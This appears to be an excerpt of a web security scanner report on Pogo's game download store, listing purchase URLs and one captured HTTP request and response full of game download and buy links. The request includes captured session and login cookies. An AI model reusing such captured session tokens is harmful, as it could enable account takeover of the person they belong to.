https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115563203&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11743417&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118017277&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118249683&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118580497&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118870270&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118958403&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119118853&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119309483&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11934720&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119354920&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119477860&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=Sun%20Dec%2012%2015%3A56%3A41%20EST%202010
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /?site=pogo&refid=headernav_fp_shopmenu&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1
Host: download-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/account/my-account/main.do
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 132267
Cache-Control: private, max-age=3809
Date: Sun, 09 Jan 2011 01:28:23 GMT
Connection: close

<HTML>
   <HEAD>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />
<meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 5:32:20 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 5:32:20 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Jewel_Quest_3-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=Jewel_Quest_3-setup.exe" onclick="omnitureLogDownload('115265627','oberonpogostd','Jewel Quest 3','puzzle','1/8/2011 5:32:20 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Jewel_Quest_3-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=Jewel_Quest_3-setup.exe" onclick="omnitureLogDownload('115265627','oberonpogostd','Jewel Quest 3','puzzle','1/8/2011 5:32:20 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 5:32:20 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 5:32:20 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe" onclick="omnitureLogDownload('111730453','oberonpogostd','The Poppit Show To Go','Pogo Original','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/poppit/poppit81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe" target="_self" onclick="omnitureLogDownload('111730453','oberonpogostd','The Poppit Show To Go','Pogo Original','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe" target="_self" onclick="omnitureLogDownload('111730453','oberonpogostd','The Poppit Show To Go','Pogo Original','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111730453&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111730453&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/SCRABBLETour/SCRABBLETour81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/monopolycity_29678465-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=monopolycity_29678465-setup.exe" onclick="omnitureLogDownload('118958403','oberonpogostd','Monopoly City','Pogo Original','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/MONOPOLYCity/MONOPOLYCity81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/monopolycity_29678465-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=monopolycity_29678465-setup.exe" target="_self" onclick="omnitureLogDownload('118958403','oberonpogostd','Monopoly City','Pogo Original','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/monopolycity_29678465-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=monopolycity_29678465-setup.exe" target="_self" onclick="omnitureLogDownload('118958403','oberonpogostd','Monopoly City','Pogo Original','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118958403&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118958403&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/ChainzGalaxy/ChainzGalaxy81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" target="_self" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" target="_self" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/CakeManiaToTheMax/CakeManiaToTheMax81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" target="_self" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" target="_self" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/TheMysteryoftheDragonPrince/TheMysteryoftheDragonPrince81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" target="_self" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" target="_self" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe" onclick="omnitureLogDownload('119718230','oberonpogostd','Jewel Quest Mysteries bundle','newGames','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/jewel_quest_mysteries_bundle/jewel_quest_mysteries_bundle81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe" target="_self" onclick="omnitureLogDownload('119718230','oberonpogostd','Jewel Quest Mysteries bundle','newGames','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe" target="_self" onclick="omnitureLogDownload('119718230','oberonpogostd','Jewel Quest Mysteries bundle','newGames','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/haunted_hidden_object_bundle_23135400-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=haunted_hidden_object_bundle_23135400-setup.exe" onclick="omnitureLogDownload('11934720','oberonpogostd','Haunted Hidden Object Bundle','Bundles','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/haunted_hidden_object_bundle/haunted_hidden_object_bundle81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/haunted_hidden_object_bundle_23135400-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=haunted_hidden_object_bundle_23135400-setup.exe" target="_self" onclick="omnitureLogDownload('11934720','oberonpogostd','Haunted Hidden Object Bundle','Bundles','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/haunted_hidden_object_bundle_23135400-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=haunted_hidden_object_bundle_23135400-setup.exe" target="_self" onclick="omnitureLogDownload('11934720','oberonpogostd','Haunted Hidden Object Bundle','Bundles','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11934720&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11934720&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/power_puzzle_pack_35128649-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=power_puzzle_pack_35128649-setup.exe" onclick="omnitureLogDownload('118249683','oberonpogostd','Power Puzzle Pack','Bundles','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/power_puzzle_pack/power_puzzle_pack81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/power_puzzle_pack_35128649-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=power_puzzle_pack_35128649-setup.exe" target="_self" onclick="omnitureLogDownload('118249683','oberonpogostd','Power Puzzle Pack','Bundles','1/8/2011 5:32:21 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/power_puzzle_pack_35128649-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=power_puzzle_pack_35128649-setup.exe" target="_self" onclick="omnitureLogDownload('118249683','oberonpogostd','Power Puzzle Pack','Bundles','1/8/2011 5:32:21 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118249683&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118249683&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe" onclick="omnitureLogDownload('119354920','oberonpogostd','Mystery PI San Francisco','Hidden Object','1/8/2011 5:32:21 PM')" target="_self" ><img src="/images/games/MysteryPIStolenInSanFracisco/MysteryPIStolenInSanFracisco81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

